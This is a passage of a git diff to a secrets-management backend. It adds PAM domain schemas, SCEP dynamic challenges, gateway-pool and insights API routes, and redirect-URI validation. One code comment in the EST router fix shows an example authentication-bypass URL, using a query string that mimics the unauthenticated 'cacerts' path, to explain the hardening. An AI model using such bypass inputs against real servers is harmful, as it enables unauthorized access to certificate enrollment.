"secret_rotation_outputs", + DeprecatedSecretRotationOutputV2 = 
"secret_rotation_output_v2", + DeprecatedApiKey = "api_keys" } export type TImmutableDBKeys = "id" | "createdAt" | "updatedAt" | "commitId"; diff --git a/backend/src/db/schemas/pam-accounts.ts b/backend/src/db/schemas/pam-accounts.ts index b84f31743b1..8402e7b1d5f 100644 --- a/backend/src/db/schemas/pam-accounts.ts +++ b/backend/src/db/schemas/pam-accounts.ts @@ -13,7 +13,7 @@ export const PamAccountsSchema = z.object({ id: z.string().uuid(), projectId: z.string(), folderId: z.string().uuid().nullable().optional(), - resourceId: z.string().uuid(), + resourceId: z.string().uuid().nullable().optional(), name: z.string(), description: z.string().nullable().optional(), encryptedCredentials: zodBuffer, @@ -25,7 +25,8 @@ export const PamAccountsSchema = z.object({ requireMfa: z.boolean().default(false).nullable().optional(), internalMetadata: z.unknown().nullable().optional(), discoveryFingerprint: z.string().nullable().optional(), - policyId: z.string().uuid().nullable().optional() + policyId: z.string().uuid().nullable().optional(), + domainId: z.string().uuid().nullable().optional() }); export type TPamAccounts = z.infer; diff --git a/backend/src/db/schemas/pam-domains.ts b/backend/src/db/schemas/pam-domains.ts new file mode 100644 index 00000000000..da1a63a99e9 --- /dev/null +++ b/backend/src/db/schemas/pam-domains.ts @@ -0,0 +1,26 @@ +// Code generated by automation script, DO NOT EDIT. +// Automated by pulling database and generating zod schema +// To update. Just run npm run generate:schema +// Written by akhilmhdh. 
+ +import { z } from "zod"; + +import { zodBuffer } from "@app/lib/zod"; + +import { TImmutableDBKeys } from "./models"; + +export const PamDomainsSchema = z.object({ + id: z.string().uuid(), + projectId: z.string(), + name: z.string(), + domainType: z.string(), + gatewayId: z.string().uuid().nullable().optional(), + encryptedConnectionDetails: zodBuffer, + discoveryFingerprint: z.string().nullable().optional(), + createdAt: z.date(), + updatedAt: z.date() +}); + +export type TPamDomains = z.infer; +export type TPamDomainsInsert = Omit, TImmutableDBKeys>; +export type TPamDomainsUpdate = Partial, TImmutableDBKeys>>; diff --git a/backend/src/db/schemas/pam-resources.ts b/backend/src/db/schemas/pam-resources.ts index 78a7c160272..0e03fcc83fb 100644 --- a/backend/src/db/schemas/pam-resources.ts +++ b/backend/src/db/schemas/pam-resources.ts @@ -20,8 +20,8 @@ export const PamResourcesSchema = z.object({ updatedAt: z.date(), encryptedRotationAccountCredentials: zodBuffer.nullable().optional(), encryptedResourceMetadata: zodBuffer.nullable().optional(), - adServerResourceId: z.string().uuid().nullable().optional(), discoveryFingerprint: z.string().nullable().optional(), + domainId: z.string().uuid().nullable().optional(), encryptedSessionSummaryConfig: zodBuffer.nullable().optional() }); diff --git a/backend/src/db/schemas/pam-sessions.ts b/backend/src/db/schemas/pam-sessions.ts index f499da367db..a3fc0d4ad42 100644 --- a/backend/src/db/schemas/pam-sessions.ts +++ b/backend/src/db/schemas/pam-sessions.ts @@ -32,7 +32,8 @@ export const PamSessionsSchema = z.object({ resourceId: z.string().uuid().nullable().optional(), encryptedAiInsights: zodBuffer.nullable().optional(), aiInsightsStatus: z.string().nullable().optional(), - aiInsightsError: z.string().nullable().optional() + aiInsightsError: z.string().nullable().optional(), + reason: z.string().nullable().optional() }); export type TPamSessions = z.infer; diff --git a/backend/src/db/schemas/pki-scep-dynamic-challenges.ts 
b/backend/src/db/schemas/pki-scep-dynamic-challenges.ts new file mode 100644 index 00000000000..cbc005ab2a4 --- /dev/null +++ b/backend/src/db/schemas/pki-scep-dynamic-challenges.ts @@ -0,0 +1,23 @@ +// Code generated by automation script, DO NOT EDIT. +// Automated by pulling database and generating zod schema +// To update. Just run npm run generate:schema +// Written by akhilmhdh. + +import { z } from "zod"; + +import { TImmutableDBKeys } from "./models"; + +export const PkiScepDynamicChallengesSchema = z.object({ + id: z.string().uuid(), + scepConfigId: z.string().uuid(), + hashedChallenge: z.string(), + expiresAt: z.date(), + createdAt: z.date(), + updatedAt: z.date() +}); + +export type TPkiScepDynamicChallenges = z.infer; +export type TPkiScepDynamicChallengesInsert = Omit, TImmutableDBKeys>; +export type TPkiScepDynamicChallengesUpdate = Partial< + Omit, TImmutableDBKeys> +>; diff --git a/backend/src/db/schemas/pki-scep-enrollment-configs.ts b/backend/src/db/schemas/pki-scep-enrollment-configs.ts index 22dd50fd39c..616b4ee18b9 100644 --- a/backend/src/db/schemas/pki-scep-enrollment-configs.ts +++ b/backend/src/db/schemas/pki-scep-enrollment-configs.ts @@ -14,11 +14,14 @@ export const PkiScepEnrollmentConfigsSchema = z.object({ encryptedRaPrivateKey: zodBuffer, raCertificate: z.string(), raCertExpiresAt: z.date(), - hashedChallengePassword: z.string(), + hashedChallengePassword: z.string().nullable().optional(), includeCaCertInResponse: z.boolean().default(true), allowCertBasedRenewal: z.boolean().default(true), createdAt: z.date(), - updatedAt: z.date() + updatedAt: z.date(), + challengeType: z.string().default("static"), + dynamicChallengeExpiryMinutes: z.number().nullable().optional(), + dynamicChallengeMaxPending: z.number().nullable().optional() }); export type TPkiScepEnrollmentConfigs = z.infer; diff --git a/backend/src/db/schemas/resource-metadata.ts b/backend/src/db/schemas/resource-metadata.ts index 4bb113d1391..c2f0acf01d8 100644 --- 
a/backend/src/db/schemas/resource-metadata.ts +++ b/backend/src/db/schemas/resource-metadata.ts @@ -25,7 +25,8 @@ export const ResourceMetadataSchema = z.object({ certificateRequestId: z.string().uuid().nullable().optional(), certificateRequestCreatedAt: z.date().nullable().optional(), pamResourceId: z.string().uuid().nullable().optional(), - pamAccountId: z.string().uuid().nullable().optional() + pamAccountId: z.string().uuid().nullable().optional(), + pamDomainId: z.string().uuid().nullable().optional() }); export type TResourceMetadata = z.infer; diff --git a/backend/src/db/schemas/webhooks.ts b/backend/src/db/schemas/webhooks.ts index 60f031ffff3..1d603e1012c 100644 --- a/backend/src/db/schemas/webhooks.ts +++ b/backend/src/db/schemas/webhooks.ts @@ -29,7 +29,8 @@ export const WebhooksSchema = z.object({ urlTag: z.string().nullable().optional(), type: z.string().default("general").nullable().optional(), encryptedPassKey: zodBuffer.nullable().optional(), - encryptedUrl: zodBuffer + encryptedUrl: zodBuffer, + filteredEvents: z.string().array().nullable().optional() }); export type TWebhooks = z.infer; diff --git a/backend/src/db/seeds/1-user.ts b/backend/src/db/seeds/1-user.ts index ec7e4bab9d8..eaed136ab96 100644 --- a/backend/src/db/seeds/1-user.ts +++ b/backend/src/db/seeds/1-user.ts @@ -1,9 +1,9 @@ -import bcrypt from "bcrypt"; import { Knex } from "knex"; import { initializeHsmModule } from "@app/ee/services/hsm/hsm-fns"; import { hsmServiceFactory } from "@app/ee/services/hsm/hsm-service"; import { getHsmConfig, initEnvConfig } from "@app/lib/config/env"; +import { crypto } from "@app/lib/crypto/cryptography"; import { initLogger, logger } from "@app/lib/logger"; import { kmsRootConfigDALFactory } from "@app/services/kms/kms-root-config-dal"; import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal"; @@ -38,9 +38,14 @@ export async function seed(knex: Knex): Promise { await initEnvConfig(hsmService, kmsRootConfigDAL, superAdminDAL, 
logger); await knex(TableName.SuperAdmin).insert([ - // eslint-disable-next-line - // @ts-ignore - { id: "00000000-0000-0000-0000-000000000000", initialized: true, allowSignUp: true } + { + // eslint-disable-next-line + // @ts-ignore + id: "00000000-0000-0000-0000-000000000000", + initialized: true, + allowSignUp: true, + fipsEnabled: process.env.FIPS_ENABLED === "true" + } ]); // Inserts seed entries @@ -65,8 +70,7 @@ export async function seed(knex: Knex): Promise { ]) .returning("*"); - // Hash password for modern login support (POST /api/v3/auth/login) - const hashedPassword = await bcrypt.hash(seedData1.password, 10); + const hashedPassword = await crypto.hashing().createHash(seedData1.password, 10); await knex(TableName.Users).where({ id: user.id }).update({ hashedPassword }); const encKeys = await generateUserSrpKeys(seedData1.password); diff --git a/backend/src/db/seeds/3-project.ts b/backend/src/db/seeds/3-project.ts index e18d774c88e..aef9395582e 100644 --- a/backend/src/db/seeds/3-project.ts +++ b/backend/src/db/seeds/3-project.ts @@ -3,7 +3,7 @@ import { Knex } from "knex"; import { initializeHsmModule } from "@app/ee/services/hsm/hsm-fns"; import { hsmServiceFactory } from "@app/ee/services/hsm/hsm-service"; import { getHsmConfig, initEnvConfig } from "@app/lib/config/env"; -import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography"; +import { crypto } from "@app/lib/crypto/cryptography"; import { generateUserSrpKeys } from "@app/lib/crypto/srp"; import { initLogger, logger } from "@app/lib/logger"; import { alphaNumericNanoId } from "@app/lib/nanoid"; @@ -22,8 +22,6 @@ import { OrgMembershipStatus, ProjectMembershipRole, ProjectType, - SecretEncryptionAlgo, - SecretKeyEncoding, TableName } from "../schemas"; import { seedData1 } from "../seed-data"; @@ -259,21 +257,15 @@ export async function seed(knex: Knex): Promise { await knex(TableName.SecretFolder).insert(envs.map(({ id }) => ({ name: "root", envId: id, parentId: null }))); // save 
secret secret blind index - const encKey = process.env.ENCRYPTION_KEY; - if (!encKey) throw new Error("Missing ENCRYPTION_KEY"); const salt = crypto.randomBytes(16).toString("base64"); - const secretBlindIndex = crypto.encryption().symmetric().encrypt({ - plaintext: salt, - key: encKey, - keySize: SymmetricKeySize.Bits128 - }); + const secretBlindIndex = crypto.encryption().symmetric().encryptWithRootEncryptionKey(salt); // insert secret blind index for project await knex(TableName.SecretBlindIndex).insert({ projectId: project.id, encryptedSaltCipherText: secretBlindIndex.ciphertext, saltIV: secretBlindIndex.iv, saltTag: secretBlindIndex.tag, - algorithm: SecretEncryptionAlgo.AES_256_GCM, - keyEncoding: SecretKeyEncoding.UTF8 + algorithm: secretBlindIndex.algorithm, + keyEncoding: secretBlindIndex.encoding }); } diff --git a/backend/src/ee/routes/est/certificate-est-router.ts b/backend/src/ee/routes/est/certificate-est-router.ts index d5876782dbf..ae216f32a97 100644 --- a/backend/src/ee/routes/est/certificate-est-router.ts +++ b/backend/src/ee/routes/est/certificate-est-router.ts @@ -56,9 +56,14 @@ export const registerCertificateEstRouter = async (server: FastifyZodProvider) = }); // Authenticate EST client using Passphrase - server.addHook("onRequest", async (req, res) => { + // Using preHandler instead of onRequest ensures rate limiting (preValidation) runs first + server.addHook("preHandler", async (req, res) => { const { authorization } = req.headers; - const urlFragments = req.url.split("/"); + + // Strip query string before parsing URL path to prevent bypass attacks + // (e.g., /simpleenroll?foo=/cacerts would otherwise match "cacerts") + const urlPath = req.url.split("?")[0]; + const urlFragments = urlPath.split("/"); // cacerts endpoint should not have any authentication if (urlFragments[urlFragments.length - 1] === "cacerts") { diff --git a/backend/src/ee/routes/scep/pki-scep-router.ts b/backend/src/ee/routes/scep/pki-scep-router.ts index 
e68b6e6dfe4..f7f27e1f372 100644 --- a/backend/src/ee/routes/scep/pki-scep-router.ts +++ b/backend/src/ee/routes/scep/pki-scep-router.ts @@ -1,7 +1,10 @@ import { z } from "zod"; +import { EventType } from "@app/ee/services/audit-log/audit-log-types"; import { BadRequestError } from "@app/lib/errors"; import { readLimit, writeLimit } from "@app/server/config/rateLimiter"; +import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; +import { AuthMode } from "@app/services/auth/auth-type"; const MAX_SCEP_MESSAGE_SIZE = 64 * 1024; // 64KB @@ -18,6 +21,7 @@ export const registerPkiScepRouter = async (server: FastifyZodProvider) => { server.addHook("onRequest", async (req) => { if ( req.method === "POST" && + req.url.includes("/pkiclient.exe") && (!req.headers["content-type"] || req.headers["content-type"] === "application/octet-stream") ) { // eslint-disable-next-line no-param-reassign @@ -113,4 +117,45 @@ export const registerPkiScepRouter = async (server: FastifyZodProvider) => { return res.send(response); } }); + + server.route({ + method: "POST", + url: "/:profileId/challenge", + config: { + rateLimit: writeLimit + }, + schema: { + params: z.object({ + profileId: z.string().uuid() + }) + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req, res) => { + const { profileId } = req.params; + + const result = await server.services.pkiScep.generateDynamicChallenge({ + profileId, + actor: req.permission.type, + actorId: req.permission.id, + actorAuthMethod: req.permission.authMethod, + actorOrgId: req.permission.orgId + }); + + void server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + projectId: result.projectId, + event: { + type: EventType.SCEP_DYNAMIC_CHALLENGE_GENERATED, + metadata: { + profileId, + profileSlug: result.profileSlug, + expiresAt: result.expiresAt + } + } + }); + + void res.header("Content-Type", "text/plain"); + return res.send(result.challenge); + } + }); }; diff --git 
a/backend/src/ee/routes/v1/ai-mcp-endpoint-router.ts b/backend/src/ee/routes/v1/ai-mcp-endpoint-router.ts index c1e2a74c810..873002eb833 100644 --- a/backend/src/ee/routes/v1/ai-mcp-endpoint-router.ts +++ b/backend/src/ee/routes/v1/ai-mcp-endpoint-router.ts @@ -592,7 +592,15 @@ export const registerAiMcpEndpointRouter = async (server: FastifyZodProvider) => endpointId: z.string().uuid().trim().min(1) }), body: z.object({ - redirect_uris: z.array(z.string()), + redirect_uris: z.array( + z + .string() + .url() + .refine( + (uri) => uri.startsWith("https://") || uri.startsWith("http://"), + "Redirect URI must start with https:// or http://" + ) + ), token_endpoint_auth_method: z.string(), grant_types: z.array(z.string()), response_types: z.array(z.string()), @@ -603,7 +611,15 @@ export const registerAiMcpEndpointRouter = async (server: FastifyZodProvider) => response: { 200: z.object({ client_id: z.string(), - redirect_uris: z.array(z.string()), + redirect_uris: z.array( + z + .string() + .url() + .refine( + (uri) => uri.startsWith("https://") || uri.startsWith("http://"), + "Redirect URI must start with https:// or http://" + ) + ), client_name: z.string(), client_uri: z.string().optional(), grant_types: z.array(z.string()), @@ -687,7 +703,13 @@ export const registerAiMcpEndpointRouter = async (server: FastifyZodProvider) => client_id: z.string(), code_challenge: z.string(), code_challenge_method: z.enum(["S256"]), - redirect_uri: z.string(), + redirect_uri: z + .string() + .url() + .refine( + (uri) => uri.startsWith("https://") || uri.startsWith("http://"), + "Redirect URI must start with https:// or http://" + ), resource: z.string().optional(), expireIn: z.string().refine((val) => ms(val) > 0, "Max TTL must be a positive number") }), diff --git a/backend/src/ee/routes/v1/gateway-pool-router.ts b/backend/src/ee/routes/v1/gateway-pool-router.ts new file mode 100644 index 00000000000..2995f29fc38 --- /dev/null +++ b/backend/src/ee/routes/v1/gateway-pool-router.ts @@ 
-0,0 +1,314 @@ +import z from "zod"; + +import { GatewayPoolMembershipsSchema, GatewayPoolsSchema, GatewaysV2Schema } from "@app/db/schemas"; +import { EventType } from "@app/ee/services/audit-log/audit-log-types"; +import { readLimit, writeLimit } from "@app/server/config/rateLimiter"; +import { slugSchema } from "@app/server/lib/schemas"; +import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; +import { AuthMode } from "@app/services/auth/auth-type"; + +const SanitizedGatewayPoolSchema = GatewayPoolsSchema.pick({ + id: true, + orgId: true, + name: true, + createdAt: true, + updatedAt: true +}); + +const SanitizedPoolMemberSchema = GatewaysV2Schema.pick({ + id: true, + name: true, + heartbeat: true, + lastHealthCheckStatus: true +}); + +export const registerGatewayPoolRouter = async (server: FastifyZodProvider) => { + // Create a gateway pool + server.route({ + method: "POST", + url: "/", + schema: { + operationId: "createGatewayPool", + body: z.object({ + name: slugSchema({ min: 1, max: 32, field: "name" }).describe("Name for the gateway pool") + }), + response: { + 200: SanitizedGatewayPoolSchema + } + }, + config: { rateLimit: writeLimit }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const pool = await server.services.gatewayPool.createGatewayPool({ + name: req.body.name, + ...req.permission + }); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + event: { + type: EventType.GATEWAY_POOL_CREATE, + metadata: { + poolId: pool.id, + name: pool.name + } + } + }); + + return pool; + } + }); + + // List gateway pools + server.route({ + method: "GET", + url: "/", + schema: { + operationId: "listGatewayPools", + response: { + 200: z.array( + SanitizedGatewayPoolSchema.extend({ + memberCount: z.number(), + healthyMemberCount: z.number(), + memberGatewayIds: z.array(z.string().uuid()), + connectedResourcesCount: z.number() + }) + ) + } + }, + 
config: { rateLimit: readLimit }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + return server.services.gatewayPool.listGatewayPools(req.permission); + } + }); + + // Get gateway pool by ID + server.route({ + method: "GET", + url: "/:poolId", + schema: { + operationId: "getGatewayPoolById", + params: z.object({ + poolId: z.string().uuid() + }), + response: { + 200: SanitizedGatewayPoolSchema.extend({ + gateways: z.array(SanitizedPoolMemberSchema) + }) + } + }, + config: { rateLimit: readLimit }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + return server.services.gatewayPool.getGatewayPoolById({ + poolId: req.params.poolId, + ...req.permission + }); + } + }); + + // Update gateway pool + server.route({ + method: "PATCH", + url: "/:poolId", + schema: { + operationId: "updateGatewayPool", + params: z.object({ + poolId: z.string().uuid() + }), + body: z.object({ + name: slugSchema({ min: 1, max: 32, field: "name" }).optional().describe("New name for the pool") + }), + response: { + 200: SanitizedGatewayPoolSchema + } + }, + config: { rateLimit: writeLimit }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const pool = await server.services.gatewayPool.updateGatewayPool({ + poolId: req.params.poolId, + name: req.body.name, + ...req.permission + }); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + event: { + type: EventType.GATEWAY_POOL_UPDATE, + metadata: { + poolId: pool.id, + name: pool.name + } + } + }); + + return pool; + } + }); + + // Delete gateway pool + server.route({ + method: "DELETE", + url: "/:poolId", + schema: { + operationId: "deleteGatewayPool", + params: z.object({ + poolId: z.string().uuid() + }), + response: { + 200: SanitizedGatewayPoolSchema + } + }, + config: { rateLimit: writeLimit }, + onRequest: verifyAuth([AuthMode.JWT, 
AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const pool = await server.services.gatewayPool.deleteGatewayPool({ + poolId: req.params.poolId, + ...req.permission + }); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + event: { + type: EventType.GATEWAY_POOL_DELETE, + metadata: { + poolId: pool.id, + name: pool.name + } + } + }); + + return pool; + } + }); + + // Add gateway to pool + server.route({ + method: "POST", + url: "/:poolId/memberships", + schema: { + operationId: "addGatewayToPool", + params: z.object({ + poolId: z.string().uuid() + }), + body: z.object({ + gatewayId: z.string().uuid().describe("ID of the gateway to add to the pool") + }), + response: { + 200: GatewayPoolMembershipsSchema.pick({ + id: true, + gatewayPoolId: true, + gatewayId: true, + createdAt: true + }) + } + }, + config: { rateLimit: writeLimit }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const { membership, poolName, gatewayName } = await server.services.gatewayPool.addGatewayToPool({ + poolId: req.params.poolId, + gatewayId: req.body.gatewayId, + ...req.permission + }); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + event: { + type: EventType.GATEWAY_POOL_ADD_MEMBER, + metadata: { + poolId: req.params.poolId, + poolName, + gatewayId: req.body.gatewayId, + gatewayName + } + } + }); + + return membership; + } + }); + + // Remove gateway from pool + server.route({ + method: "DELETE", + url: "/:poolId/memberships/:gatewayId", + schema: { + operationId: "removeGatewayFromPool", + params: z.object({ + poolId: z.string().uuid(), + gatewayId: z.string().uuid() + }), + response: { + 200: GatewayPoolMembershipsSchema.pick({ + id: true, + gatewayPoolId: true, + gatewayId: true, + createdAt: true + }) + } + }, + config: { rateLimit: writeLimit }, + onRequest: verifyAuth([AuthMode.JWT, 
AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const { membership, poolName, gatewayName } = await server.services.gatewayPool.removeGatewayFromPool({ + poolId: req.params.poolId, + gatewayId: req.params.gatewayId, + ...req.permission + }); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + event: { + type: EventType.GATEWAY_POOL_REMOVE_MEMBER, + metadata: { + poolId: req.params.poolId, + poolName, + gatewayId: req.params.gatewayId, + gatewayName + } + } + }); + + return membership; + } + }); + + // Get connected resources for a pool + server.route({ + method: "GET", + url: "/:poolId/resources", + schema: { + operationId: "getGatewayPoolConnectedResources", + params: z.object({ + poolId: z.string().uuid() + }), + response: { + 200: z.object({ + kubernetesAuths: z.array( + z.object({ + id: z.string(), + identityId: z.string(), + identityName: z.string().nullable() + }) + ) + }) + } + }, + config: { rateLimit: readLimit }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + return server.services.gatewayPool.getConnectedResources({ + poolId: req.params.poolId, + ...req.permission + }); + } + }); +}; diff --git a/backend/src/ee/routes/v1/index.ts b/backend/src/ee/routes/v1/index.ts index c8b353f6eab..7ef91cddffb 100644 --- a/backend/src/ee/routes/v1/index.ts +++ b/backend/src/ee/routes/v1/index.ts @@ -17,11 +17,13 @@ import { registerDynamicSecretRouter } from "./dynamic-secret-router"; import { registerEmailDomainRouter } from "./email-domain-router"; import { registerExternalKmsRouter } from "./external-kms-router"; import { EXTERNAL_KMS_REGISTER_ROUTER_MAP } from "./external-kms-routers"; +import { registerGatewayPoolRouter } from "./gateway-pool-router"; import { registerGatewayRouter } from "./gateway-router"; import { registerGithubOrgSyncRouter } from "./github-org-sync-router"; import { registerGroupRouter } from "./group-router"; import 
{ registerIdentityProjectAdditionalPrivilegeRouter } from "./identity-project-additional-privilege-router"; import { registerIdentityTemplateRouter } from "./identity-template-router"; +import { registerInsightsRouter } from "./insights-router"; import { registerKmipRouter } from "./kmip-router"; import { registerKmipSpecRouter } from "./kmip-spec-router"; import { registerLdapRouter } from "./ldap-router"; @@ -33,6 +35,11 @@ import { PAM_ACCOUNT_REGISTER_ROUTER_MAP } from "./pam-account-routers"; import { registerPamAccountRouter } from "./pam-account-routers/pam-account-router"; import { PAM_DISCOVERY_REGISTER_ROUTER_MAP } from "./pam-discovery-routers"; import { registerPamDiscoveryRouter } from "./pam-discovery-routers/pam-discovery-router"; +import { + PAM_DOMAIN_ACCOUNT_REGISTER_ROUTER_MAP, + PAM_DOMAIN_REGISTER_ROUTER_MAP, + registerPamDomainRouter +} from "./pam-domain-routers"; import { registerPamFolderRouter } from "./pam-folder-router"; import { PAM_RESOURCE_REGISTER_ROUTER_MAP } from "./pam-resource-routers"; import { registerPamResourceRotationRulesRouter } from "./pam-resource-routers/pam-resource-rotation-rules-router"; @@ -49,8 +56,6 @@ import { registerRelayRouter } from "./relay-router"; import { registerSamlRouter } from "./saml-router"; import { registerScimRouter } from "./scim-router"; import { registerSecretApprovalRequestRouter } from "./secret-approval-request-router"; -import { registerSecretRotationProviderRouter } from "./secret-rotation-provider-router"; -import { registerSecretRotationRouter } from "./secret-rotation-router"; import { registerSecretRouter } from "./secret-router"; import { registerSecretScanningRouter } from "./secret-scanning-router"; import { registerSecretVersionRouter } from "./secret-version-router"; @@ -96,9 +101,6 @@ export const registerV1EERoutes = async (server: FastifyZodProvider) => { await server.register(registerSecretApprovalRequestRouter, { prefix: "/secret-approval-requests" }); - await 
server.register(registerSecretRotationProviderRouter, { - prefix: "/secret-rotation-providers" - }); await server.register(registerAccessApprovalPolicyRouter, { prefix: "/access-approvals/policies" }); await server.register(registerAccessApprovalRequestRouter, { prefix: "/access-approvals/requests" }); @@ -114,9 +116,12 @@ export const registerV1EERoutes = async (server: FastifyZodProvider) => { ); await server.register(registerGatewayRouter, { prefix: "/gateways" }); + await server.register(registerGatewayPoolRouter, { prefix: "/gateway-pools" }); await server.register(registerRelayRouter, { prefix: "/relays" }); await server.register(registerGithubOrgSyncRouter, { prefix: "/github-org-sync-config" }); + await server.register(registerInsightsRouter, { prefix: "/insights" }); + await server.register( async (pkiRouter) => { await pkiRouter.register(registerCaCrlRouter, { prefix: "/crl" }); @@ -149,7 +154,6 @@ export const registerV1EERoutes = async (server: FastifyZodProvider) => { await server.register(registerScimRouter, { prefix: "/scim" }); await server.register(registerLdapRouter, { prefix: "/ldap" }); await server.register(registerSecretScanningRouter, { prefix: "/secret-scanning" }); - await server.register(registerSecretRotationRouter, { prefix: "/secret-rotations" }); await server.register(registerSecretRouter, { prefix: "/secrets" }); await server.register(registerSecretVersionRouter, { prefix: "/secret" }); await server.register(registerGroupRouter, { prefix: "/groups" }); @@ -206,6 +210,19 @@ export const registerV1EERoutes = async (server: FastifyZodProvider) => { await pamRouter.register(registerPamFolderRouter, { prefix: "/folders" }); await pamRouter.register(registerPamSessionRouter, { prefix: "/sessions" }); await pamRouter.register(registerPamAccountPolicyRouter, { prefix: "/account-policies" }); + await pamRouter.register( + async (pamDomainRouter) => { + await pamDomainRouter.register(registerPamDomainRouter); + + // Domain-type-specific 
endpoints + await Promise.all( + Object.entries(PAM_DOMAIN_REGISTER_ROUTER_MAP).map(([provider, router]) => + pamDomainRouter.register(router, { prefix: `/${provider}` }) + ) + ); + }, + { prefix: "/domains" } + ); await pamRouter.register( async (pamDiscoveryRouter) => { await pamDiscoveryRouter.register(registerPamDiscoveryRouter); @@ -224,12 +241,19 @@ export const registerV1EERoutes = async (server: FastifyZodProvider) => { async (pamAccountRouter) => { await pamAccountRouter.register(registerPamAccountRouter); - // Provider-specific endpoints + // Resource-type-specific account endpoints await Promise.all( Object.entries(PAM_ACCOUNT_REGISTER_ROUTER_MAP).map(([provider, router]) => pamAccountRouter.register(router, { prefix: `/${provider}` }) ) ); + + // Domain-type-specific account endpoints + await Promise.all( + Object.entries(PAM_DOMAIN_ACCOUNT_REGISTER_ROUTER_MAP).map(([provider, router]) => + pamAccountRouter.register(router, { prefix: `/${provider}` }) + ) + ); }, { prefix: "/accounts" } ); diff --git a/backend/src/ee/routes/v1/insights-router.ts b/backend/src/ee/routes/v1/insights-router.ts new file mode 100644 index 00000000000..7c65e229fdd --- /dev/null +++ b/backend/src/ee/routes/v1/insights-router.ts @@ -0,0 +1,238 @@ +import { z } from "zod"; + +import { EventType } from "@app/ee/services/audit-log/audit-log-types"; +import { readLimit } from "@app/server/config/rateLimiter"; +import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; +import { AuthMode } from "@app/services/auth/auth-type"; + +export const registerInsightsRouter = async (server: FastifyZodProvider) => { + server.route({ + method: "GET", + url: "/secrets/calendar", + config: { rateLimit: readLimit }, + schema: { + operationId: "getInsightsCalendar", + description: "Get secret rotation and reminder events for a calendar month view", + security: [{ bearerAuth: [] }], + querystring: z.object({ + projectId: z.string().trim(), + month: z.coerce.number().min(1).max(12), + year: 
z.coerce.number().min(2000).max(2100) + }), + response: { + 200: z.object({ + rotations: z.array( + z.object({ + id: z.string(), + name: z.string(), + type: z.string(), + nextRotationAt: z.date().nullable(), + environment: z.string(), + secretPath: z.string(), + secretKeys: z.string().array(), + rotationInterval: z.number(), + rotationStatus: z.string().nullable(), + isAutoRotationEnabled: z.boolean() + }) + ), + reminders: z.array( + z.object({ + id: z.string(), + secretId: z.string().nullable(), + secretKey: z.string(), + nextReminderDate: z.date(), + message: z.string().nullable().optional(), + environment: z.string(), + secretPath: z.string(), + repeatDays: z.number().nullable().optional() + }) + ) + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const { projectId, month, year } = req.query; + const result = await server.services.insights.getCalendar({ projectId, month, year }, req.permission); + await server.services.auditLog.createAuditLog({ + projectId, + event: { type: EventType.VIEW_INSIGHTS_SECRETS_MANAGEMENT_CALENDAR, metadata: { projectId, month, year } }, + ...req.auditLogInfo + }); + return result; + } + }); + + server.route({ + method: "GET", + url: "/secrets/access-volume", + config: { rateLimit: readLimit }, + schema: { + operationId: "getInsightsAccessVolume", + description: "Get secret access volume aggregated by day and actor for the past week", + security: [{ bearerAuth: [] }], + querystring: z.object({ + projectId: z.string().trim() + }), + response: { + 200: z.object({ + days: z.array( + z.object({ + date: z.string(), + total: z.number(), + actors: z.array(z.object({ name: z.string(), type: z.string(), count: z.number() })) + }) + ) + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const { projectId } = req.query; + const result = await server.services.insights.getAccessVolume({ projectId }, req.permission); + await server.services.auditLog.createAuditLog({ + projectId, + 
event: { type: EventType.VIEW_INSIGHTS_SECRETS_MANAGEMENT_ACCESS_VOLUME, metadata: { projectId } }, + ...req.auditLogInfo + }); + return result; + } + }); + + // server.route({ + // method: "GET", + // url: "/secrets/access-locations", + // config: { rateLimit: readLimit }, + // schema: { + // operationId: "getInsightsAccessLocations", + // description: "Get geographic locations of secret access based on audit log IP addresses", + // security: [{ bearerAuth: [] }], + // querystring: z.object({ + // projectId: z.string().trim(), + // days: z.coerce.number().min(1).max(90).default(30) + // }), + // response: { + // 200: z.object({ + // locations: z.array( + // z.object({ lat: z.number(), lng: z.number(), city: z.string(), country: z.string(), count: z.number() }) + // ) + // }) + // } + // }, + // onRequest: verifyAuth([AuthMode.JWT]), + // handler: async (req) => { + // const { projectId, days } = req.query; + // const result = await server.services.insights.getAccessLocations({ projectId, days }, req.permission); + // await server.services.auditLog.createAuditLog({ + // projectId, + // event: { type: EventType.VIEW_INSIGHTS_SECRETS_MANAGEMENT_ACCESS_LOCATIONS, metadata: { projectId, days } }, + // ...req.auditLogInfo + // }); + // return result; + // } + // }); + + server.route({ + method: "GET", + url: "/auth/method-distribution", + config: { rateLimit: readLimit }, + schema: { + operationId: "getInsightsAuthMethodDistribution", + description: "Get distribution of authentication methods from secret access audit logs", + security: [{ bearerAuth: [] }], + querystring: z.object({ + projectId: z.string().trim(), + days: z.coerce.number().min(1).max(90).default(30) + }), + response: { + 200: z.object({ + methods: 